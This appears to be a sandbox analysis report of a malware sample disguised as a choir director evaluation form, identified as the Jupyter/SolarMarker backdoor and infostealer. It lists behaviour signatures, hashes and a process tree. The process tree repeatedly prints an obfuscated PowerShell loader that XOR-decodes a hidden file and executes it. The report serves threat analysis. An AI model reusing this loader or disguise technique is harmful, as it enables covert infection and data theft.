Analysis
-
max time kernel
144s -
max time network
145s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
27-05-2021 06:20
General
-
Target
Choir-Director-Evaluation-Form.exe
-
Size
107.7MB
-
MD5
e4b18058271e4c9bfc7e3759a6132437
-
SHA1
70248c40ca94932a7f098a26ee7858bda5903d73
-
SHA256
8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1
-
SHA512
4bf709dc7e3e32d7a694732b60150ea97b834465a8074d6b3d4acab0633d3e6f2a96d211f04c58397032bf60e8b4e172c775c95b3afe8765f8e2f1b650c6a045
Malware Config
Signatures
-
Jupyter, SolarMarker
Jupyter is a backdoor and infostealer first seen in mid 2020.
-
Registers COM server for autorun 1 TTPs
-
Blocklisted process makes network request 10 IoCs
-
Executes dropped EXE 12 IoCs
-
Registers new Print Monitor 2 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 5 IoCs
-
Loads dropped DLL 64 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Installs/modifies Browser Helper Object 2 TTPs
BHOs are DLL modules which act as plugins for Internet Explorer.
-
Drops file in System32 directory 11 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 64 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Modifies Internet Explorer settings 1 TTPs 10 IoCs
-
Modifies data under HKEY_USERS 52 IoCs
-
Modifies registry class 64 IoCs
-
Modifies system certificate store 2 TTPs 8 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: MapViewOfSection 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 6 IoCs
-
Suspicious use of SendNotifyMessage 2 IoCs
-
Suspicious use of SetWindowsHookEx 3 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Choir-Director-Evaluation-Form.exe"C:\Users\Admin\AppData\Local\Temp\Choir-Director-Evaluation-Form.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-8E9RG.tmp\Choir-Director-Evaluation-Form.tmp"C:\Users\Admin\AppData\Local\Temp\is-8E9RG.tmp\Choir-Director-Evaluation-Form.tmp" /SL5="$2011A,111934780,999424,C:\Users\Admin\AppData\Local\Temp\Choir-Director-Evaluation-Form.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-6P3E1.tmp\PDFescape_Desktop_Installer.exe"C:\Users\Admin\AppData\Local\Temp\is-6P3E1.tmp\PDFescape_Desktop_Installer.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32.exe /s "C:\ProgramData\PDFescape Desktop\Installation\Statistics.dll"4⤵
- Loads dropped DLL
- Modifies registry class
-
C:\ProgramData\PDFescape Desktop\Installation\PDFescapeDesktopInstaller.exe"C:\ProgramData\PDFescape Desktop\Installation\PDFescapeDesktopInstaller.exe" /RegServer4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$e9e4ddb1f3df7d34e8dfbcb832e3f3fc='C:\Users\Admin\0816c0c5f2fe2943dbdf075899531258\c0ec063610a26b9bf06cdf7cf9501298\12331d2c2acf4e4c1d63a0c13b349dee\c1a1dda7d4f952966ac0cfc3aeb38767\b501b3797ce826399d5d5e65f4d5c20c\8552f124ebd49ad34c4123b714ed41e9\b3158b8175241aa9ab2c13d7384ed16a';$9920df3c874536b25161629cb2e4ef6b='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$551c940ba5a1f72b0b10cc3abcd7f33d=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($e9e4ddb1f3df7d34e8dfbcb832e3f3fc));remove-item $e9e4ddb1f3df7d34e8dfbcb832e3f3fc;for($i=0;$i -lt $551c940ba5a1f72b0b10cc3abcd7f33d.count;){for($j=0;$j -lt $9920df3c874536b25161629cb2e4ef6b.length;$j++){$551c940ba5a1f72b0b10cc3abcd7f33d[$i]=$551c940ba5a1f72b0b10cc3abcd7f33d[$i] -bxor $9920df3c874536b25161629cb2e4ef6b[$j];$i++;if($i -ge $551c940ba5a1f72b0b10cc3abcd7f33d.count){$j=$9920df3c874536b25161629cb2e4ef6b.length}}};$551c940ba5a1f72b0b10cc3abcd7f33d=[System.Text.Encoding]::UTF8.GetString($551c940ba5a1f72b0b10cc3abcd7f33d);iex $551c940ba5a1f72b0b10cc3abcd7f33d;"3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$e9e4ddb1f3df7d34e8dfbcb832e3f3fc='C:\Users\Admin\0816c0c5f2fe2943dbdf075899531258\c0ec063610a26b9bf06cdf7cf9501298\12331d2c2acf4e4c1d63a0c13b349dee\c1a1dda7d4f952966ac0cfc3aeb38767\b501b3797ce826399d5d5e65f4d5c20c\8552f124ebd49ad34c4123b714ed41e9\b3158b8175241aa9ab2c13d7384ed16a';$9920df3c874536b25161629cb2e4ef6b='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$551c940ba5a1f72b0b10cc3abcd7f33d=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($e9e4ddb1f3df7d34e8dfbcb832e3f3fc));remove-item $e9e4ddb1f3df7d34e8dfbcb832e3f3fc;for($i=0;$i -lt $551c940ba5a1f72b0b10cc3abcd7f33d.count;){for($j=0;$j -lt $9920df3c874536b25161629cb2e4ef6b.length;$j++){$551c940ba5a1f72b0b10cc3abcd7f33d[$i]=$551c940ba5a1f72b0b10cc3abcd7f33d[$i] -bxor $9920df3c874536b25161629cb2e4ef6b[$j];$i++;if($i -ge $551c940ba5a1f72b0b10cc3abcd7f33d.count){$j=$9920df3c874536b25161629cb2e4ef6b.length}}};$551c940ba5a1f72b0b10cc3abcd7f33d=[System.Text.Encoding]::UTF8.GetString($551c940ba5a1f72b0b10cc3abcd7f33d);iex $551c940ba5a1f72b0b10cc3abcd7f33d;"3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$e9e4ddb1f3df7d34e8dfbcb832e3f3fc='C:\Users\Admin\0816c0c5f2fe2943dbdf075899531258\c0ec063610a26b9bf06cdf7cf9501298\12331d2c2acf4e4c1d63a0c13b349dee\c1a1dda7d4f952966ac0cfc3aeb38767\b501b3797ce826399d5d5e65f4d5c20c\8552f124ebd49ad34c4123b714ed41e9\b3158b8175241aa9ab2c13d7384ed16a';$9920df3c874536b25161629cb2e4ef6b='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$551c940ba5a1f72b0b10cc3abcd7f33d=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($e9e4ddb1f3df7d34e8dfbcb832e3f3fc));remove-item $e9e4ddb1f3df7d34e8dfbcb832e3f3fc;for($i=0;$i -lt $551c940ba5a1f72b0b10cc3abcd7f33d.count;){for($j=0;$j -lt $9920df3c874536b25161629cb2e4ef6b.length;$j++){$551c940ba5a1f72b0b10cc3abcd7f33d[$i]=$551c940ba5a1f72b0b10cc3abcd7f33d[$i] -bxor $9920df3c874536b25161629cb2e4ef6b[$j];$i++;if($i -ge $551c940ba5a1f72b0b10cc3abcd7f33d.count){$j=$9920df3c874536b25161629cb2e4ef6b.length}}};$551c940ba5a1f72b0b10cc3abcd7f33d=[System.Text.Encoding]::UTF8.GetString($551c940ba5a1f72b0b10cc3abcd7f33d);iex $551c940ba5a1f72b0b10cc3abcd7f33d;"3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$e9e4ddb1f3df7d34e8dfbcb832e3f3fc='C:\Users\Admin\0816c0c5f2fe2943dbdf075899531258\c0ec063610a26b9bf06cdf7cf9501298\12331d2c2acf4e4c1d63a0c13b349dee\c1a1dda7d4f952966ac0cfc3aeb38767\b501b3797ce826399d5d5e65f4d5c20c\8552f124ebd49ad34c4123b714ed41e9\b3158b8175241aa9ab2c13d7384ed16a';$9920df3c874536b25161629cb2e4ef6b='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$551c940ba5a1f72b0b10cc3abcd7f33d=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($e9e4ddb1f3df7d34e8dfbcb832e3f3fc));remove-item $e9e4ddb1f3df7d34e8dfbcb832e3f3fc;for($i=0;$i -lt $551c940ba5a1f72b0b10cc3abcd7f33d.count;){for($j=0;$j -lt $9920df3c874536b25161629cb2e4ef6b.length;$j++){$551c940ba5a1f72b0b10cc3abcd7f33d[$i]=$551c940ba5a1f72b0b10cc3abcd7f33d[$i] -bxor $9920df3c874536b25161629cb2e4ef6b[$j];$i++;if($i -ge $551c940ba5a1f72b0b10cc3abcd7f33d.count){$j=$9920df3c874536b25161629cb2e4ef6b.length}}};$551c940ba5a1f72b0b10cc3abcd7f33d=[System.Text.Encoding]::UTF8.GetString($551c940ba5a1f72b0b10cc3abcd7f33d);iex $551c940ba5a1f72b0b10cc3abcd7f33d;"3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$e9e4ddb1f3df7d34e8dfbcb832e3f3fc='C:\Users\Admin\0816c0c5f2fe2943dbdf075899531258\c0ec063610a26b9bf06cdf7cf9501298\12331d2c2acf4e4c1d63a0c13b349dee\c1a1dda7d4f952966ac0cfc3aeb38767\b501b3797ce826399d5d5e65f4d5c20c\8552f124ebd49ad34c4123b714ed41e9\b3158b8175241aa9ab2c13d7384ed16a';$9920df3c874536b25161629cb2e4ef6b='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$551c940ba5a1f72b0b10cc3abcd7f33d=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($e9e4ddb1f3df7d34e8dfbcb832e3f3fc));remove-item $e9e4ddb1f3df7d34e8dfbcb832e3f3fc;for($i=0;$i -lt $551c940ba5a1f72b0b10cc3abcd7f33d.count;){for($j=0;$j -lt $9920df3c874536b25161629cb2e4ef6b.length;$j++){$551c940ba5a1f72b0b10cc3abcd7f33d[$i]=$551c940ba5a1f72b0b10cc3abcd7f33d[$i] -bxor $9920df3c874536b25161629cb2e4ef6b[$j];$i++;if($i -ge $551c940ba5a1f72b0b10cc3abcd7f33d.count){$j=$9920df3c874536b25161629cb2e4ef6b.length}}};$551c940ba5a1f72b0b10cc3abcd7f33d=[System.Text.Encoding]::UTF8.GetString($551c940ba5a1f72b0b10cc3abcd7f33d);iex $551c940ba5a1f72b0b10cc3abcd7f33d;"3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$e9e4ddb1f3df7d34e8dfbcb832e3f3fc='C:\Users\Admin\0816c0c5f2fe2943dbdf075899531258\c0ec063610a26b9bf06cdf7cf9501298\12331d2c2acf4e4c1d63a0c13b349dee\c1a1dda7d4f952966ac0cfc3aeb38767\b501b3797ce826399d5d5e65f4d5c20c\8552f124ebd49ad34c4123b714ed41e9\b3158b8175241aa9ab2c13d7384ed16a';$9920df3c874536b25161629cb2e4ef6b='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$551c940ba5a1f72b0b10cc3abcd7f33d=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($e9e4ddb1f3df7d34e8dfbcb832e3f3fc));remove-item $e9e4ddb1f3df7d34e8dfbcb832e3f3fc;for($i=0;$i -lt $551c940ba5a1f72b0b10cc3abcd7f33d.count;){for($j=0;$j -lt $9920df3c874536b25161629cb2e4ef6b.length;$j++){$551c940ba5a1f72b0b10cc3abcd7f33d[$i]=$551c940ba5a1f72b0b10cc3abcd7f33d[$i] -bxor $9920df3c874536b25161629cb2e4ef6b[$j];$i++;if($i -ge $551c940ba5a1f72b0b10cc3abcd7f33d.count){$j=$9920df3c874536b25161629cb2e4ef6b.length}}};$551c940ba5a1f72b0b10cc3abcd7f33d=[System.Text.Encoding]::UTF8.GetString($551c940ba5a1f72b0b10cc3abcd7f33d);iex $551c940ba5a1f72b0b10cc3abcd7f33d;"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$e9e4ddb1f3df7d34e8dfbcb832e3f3fc='C:\Users\Admin\0816c0c5f2fe2943dbdf075899531258\c0ec063610a26b9bf06cdf7cf9501298\12331d2c2acf4e4c1d63a0c13b349dee\c1a1dda7d4f952966ac0cfc3aeb38767\b501b3797ce826399d5d5e65f4d5c20c\8552f124ebd49ad34c4123b714ed41e9\b3158b8175241aa9ab2c13d7384ed16a';$9920df3c874536b25161629cb2e4ef6b='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$551c940ba5a1f72b0b10cc3abcd7f33d=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($e9e4ddb1f3df7d34e8dfbcb832e3f3fc));remove-item $e9e4ddb1f3df7d34e8dfbcb832e3f3fc;for($i=0;$i -lt $551c940ba5a1f72b0b10cc3abcd7f33d.count;){for($j=0;$j -lt $9920df3c874536b25161629cb2e4ef6b.length;$j++){$551c940ba5a1f72b0b10cc3abcd7f33d[$i]=$551c940ba5a1f72b0b10cc3abcd7f33d[$i] -bxor $9920df3c874536b25161629cb2e4ef6b[$j];$i++;if($i -ge $551c940ba5a1f72b0b10cc3abcd7f33d.count){$j=$9920df3c874536b25161629cb2e4ef6b.length}}};$551c940ba5a1f72b0b10cc3abcd7f33d=[System.Text.Encoding]::UTF8.GetString($551c940ba5a1f72b0b10cc3abcd7f33d);iex $551c940ba5a1f72b0b10cc3abcd7f33d;"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$e9e4ddb1f3df7d34e8dfbcb832e3f3fc='C:\Users\Admin\0816c0c5f2fe2943dbdf075899531258\c0ec063610a26b9bf06cdf7cf9501298\12331d2c2acf4e4c1d63a0c13b349dee\c1a1dda7d4f952966ac0cfc3aeb38767\b501b3797ce826399d5d5e65f4d5c20c\8552f124ebd49ad34c4123b714ed41e9\b3158b8175241aa9ab2c13d7384ed16a';$9920df3c874536b25161629cb2e4ef6b='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$551c940ba5a1f72b0b10cc3abcd7f33d=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($e9e4ddb1f3df7d34e8dfbcb832e3f3fc));remove-item $e9e4ddb1f3df7d34e8dfbcb832e3f3fc;for($i=0;$i -lt $551c940ba5a1f72b0b10cc3abcd7f33d.count;){for($j=0;$j -lt $9920df3c874536b25161629cb2e4ef6b.length;$j++){$551c940ba5a1f72b0b10cc3abcd7f33d[$i]=$551c940ba5a1f72b0b10cc3abcd7f33d[$i] -bxor $9920df3c874536b25161629cb2e4ef6b[$j];$i++;if($i -ge $551c940ba5a1f72b0b10cc3abcd7f33d.count){$j=$9920df3c874536b25161629cb2e4ef6b.length}}};$551c940ba5a1f72b0b10cc3abcd7f33d=[System.Text.Encoding]::UTF8.GetString($551c940ba5a1f72b0b10cc3abcd7f33d);iex $551c940ba5a1f72b0b10cc3abcd7f33d;"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$e9e4ddb1f3df7d34e8dfbcb832e3f3fc='C:\Users\Admin\0816c0c5f2fe2943dbdf075899531258\c0ec063610a26b9bf06cdf7cf9501298\12331d2c2acf4e4c1d63a0c13b349dee\c1a1dda7d4f952966ac0cfc3aeb38767\b501b3797ce826399d5d5e65f4d5c20c\8552f124ebd49ad34c4123b714ed41e9\b3158b8175241aa9ab2c13d7384ed16a';$9920df3c874536b25161629cb2e4ef6b='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$551c940ba5a1f72b0b10cc3abcd7f33d=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($e9e4ddb1f3df7d34e8dfbcb832e3f3fc));remove-item $e9e4ddb1f3df7d34e8dfbcb832e3f3fc;for($i=0;$i -lt $551c940ba5a1f72b0b10cc3abcd7f33d.count;){for($j=0;$j -lt $9920df3c874536b25161629cb2e4ef6b.length;$j++){$551c940ba5a1f72b0b10cc3abcd7f33d[$i]=$551c940ba5a1f72b0b10cc3abcd7f33d[$i] -bxor $9920df3c874536b25161629cb2e4ef6b[$j];$i++;if($i -ge $551c940ba5a1f72b0b10cc3abcd7f33d.count){$j=$9920df3c874536b25161629cb2e4ef6b.length}}};$551c940ba5a1f72b0b10cc3abcd7f33d=[System.Text.Encoding]::UTF8.GetString($551c940ba5a1f72b0b10cc3abcd7f33d);iex $551c940ba5a1f72b0b10cc3abcd7f33d;"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$e9e4ddb1f3df7d34e8dfbcb832e3f3fc='C:\Users\Admin\0816c0c5f2fe2943dbdf075899531258\c0ec063610a26b9bf06cdf7cf9501298\12331d2c2acf4e4c1d63a0c13b349dee\c1a1dda7d4f952966ac0cfc3aeb38767\b501b3797ce826399d5d5e65f4d5c20c\8552f124ebd49ad34c4123b714ed41e9\b3158b8175241aa9ab2c13d7384ed16a';$9920df3c874536b25161629cb2e4ef6b='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$551c940ba5a1f72b0b10cc3abcd7f33d=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($e9e4ddb1f3df7d34e8dfbcb832e3f3fc));remove-item $e9e4ddb1f3df7d34e8dfbcb832e3f3fc;for($i=0;$i -lt $551c940ba5a1f72b0b10cc3abcd7f33d.count;){for($j=0;$j -lt $9920df3c874536b25161629cb2e4ef6b.length;$j++){$551c940ba5a1f72b0b10cc3abcd7f33d[$i]=$551c940ba5a1f72b0b10cc3abcd7f33d[$i] -bxor $9920df3c874536b25161629cb2e4ef6b[$j];$i++;if($i -ge $551c940ba5a1f72b0b10cc3abcd7f33d.count){$j=$9920df3c874536b25161629cb2e4ef6b.length}}};$551c940ba5a1f72b0b10cc3abcd7f33d=[System.Text.Encoding]::UTF8.GetString($551c940ba5a1f72b0b10cc3abcd7f33d);iex $551c940ba5a1f72b0b10cc3abcd7f33d;"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{2BC47158-F746-4E22-B116-D481B09E9674}1⤵
- Loads dropped DLL
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵
-
C:\Windows\System32\MsiExec.exe"C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\preview-handler.dll"2⤵
- Loads dropped DLL
- Modifies registry class
-
C:\Windows\System32\MsiExec.exe"C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\thumbnail-handler.dll"2⤵
- Loads dropped DLL
-
C:\Windows\System32\MsiExec.exe"C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\context-menu.dll"2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exe"C:\Windows\syswow64\MsiExec.exe" /Y "C:\Program Files (x86)\PDFescape Desktop\pdfactivedoc.dll"2⤵
- Loads dropped DLL
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Program Files\PDFescape Desktop\ws.exe"C:\Program Files\PDFescape Desktop\ws.exe" -service2⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
-
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding EC4E8D2538A7BD806215B7051BED98E4 E Global\MSI00002⤵
- Loads dropped DLL
-
C:\Program Files\PDFescape Desktop\updater-ws.exe"C:\Program Files\PDFescape Desktop\updater-ws.exe" -service2⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
-
C:\Windows\System32\MsiExec.exe"C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\creator\plugins\IEAddin\creator-ie-helper.dll"2⤵
- Loads dropped DLL
- Modifies registry class
-
C:\Windows\System32\MsiExec.exe"C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\creator\plugins\IEAddin\creator-ie-plugin.dll"2⤵
- Loads dropped DLL
- Modifies Internet Explorer settings
-
C:\Windows\System32\MsiExec.exe"C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\creator\plugins\OfficeAddin\creator-word-plugin.dll"2⤵
- Loads dropped DLL
-
C:\Windows\System32\MsiExec.exe"C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\creator\plugins\OfficeAddin\creator-excel-plugin.dll"2⤵
- Loads dropped DLL
- Modifies registry class
-
C:\Windows\System32\MsiExec.exe"C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\creator\plugins\OfficeAddin\creator-powerpoint-plugin.dll"2⤵
- Loads dropped DLL
- Modifies registry class
-
C:\Windows\syswow64\MsiExec.exe"C:\Windows\syswow64\MsiExec.exe" /Y "C:\Program Files (x86)\PDFescape Desktop\creator\plugins\IEAddin\creator-ie-helper.dll"2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exe"C:\Windows\syswow64\MsiExec.exe" /Y "C:\Program Files (x86)\PDFescape Desktop\creator\plugins\IEAddin\creator-ie-plugin.dll"2⤵
- Loads dropped DLL
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Program Files\PDFescape Desktop\creator\common\printer-installer-app.exe"C:\Program Files\PDFescape Desktop\creator\common\printer-installer-app.exe" -i "C:\Program Files\PDFescape Desktop\creator\common"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Program Files\PDFescape Desktop\creator\common\creator-app.exe"C:\Program Files\PDFescape Desktop\creator\common\creator-app.exe" -regserver2⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Program Files\PDFescape Desktop\creator\common\creator-ws.exe"C:\Program Files\PDFescape Desktop\creator\common\creator-ws.exe" -service2⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
- Loads dropped DLL
- Drops file in System32 directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
-
C:\Program Files\PDFescape Desktop\escape.exe"C:\Program Files\PDFescape Desktop\escape.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
-
C:\Program Files\PDFescape Desktop\escape.exe"C:\Program Files\PDFescape Desktop\escape.exe" --update --update-silent2⤵
- Executes dropped EXE
-
C:\Program Files\PDFescape Desktop\ws.exe"C:\Program Files\PDFescape Desktop\ws.exe"1⤵
- Executes dropped EXE
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Program Files\PDFescape Desktop\updater-ws.exe"C:\Program Files\PDFescape Desktop\updater-ws.exe"1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\PDFescape Desktop\pdfactivedoc.dllMD5
a733c1f89219252497e94cbc66272478
SHA1f5f9be9a2345f6dc0414c3b62b4087faa32ce351
SHA256557bb1a545eac9c352dbbe15fbf383d29c6b2640b8cf74e49fefcdee97270547
SHA512875b4958cadbd8901f4fcb6c5c12f24e2112dbd287975134c6f83573d6ce679be0058dc259ab1db31a64dc48470622c80e75555e43a240e63854df859b65e0bd
-
C:\Program Files\PDFescape Desktop\atom.dllMD5
9148f07e6dedce3e8e6a642fba0402d8
SHA12e403f6b65bf4519d0883ebb0025d77130105a1c
SHA25635bd82d881759b2aa8ef6dc6e26d0943a19593b2192d207b4440c6e1a29ba05a
SHA5128f7ab028af2b782df35bf9940a8f367ac49f015d8302242d553e9437882b1fb76ebc91f3dfe2faadd2cde07af260e8ad140e3a59f0f44c05188ebf2bcfe016cb
-
C:\Program Files\PDFescape Desktop\brand.dllMD5
594a3e3adcf139e7b20eddd1f16131d3
SHA17700c89b10e779fc6db72b42be0a81fe89378f9a
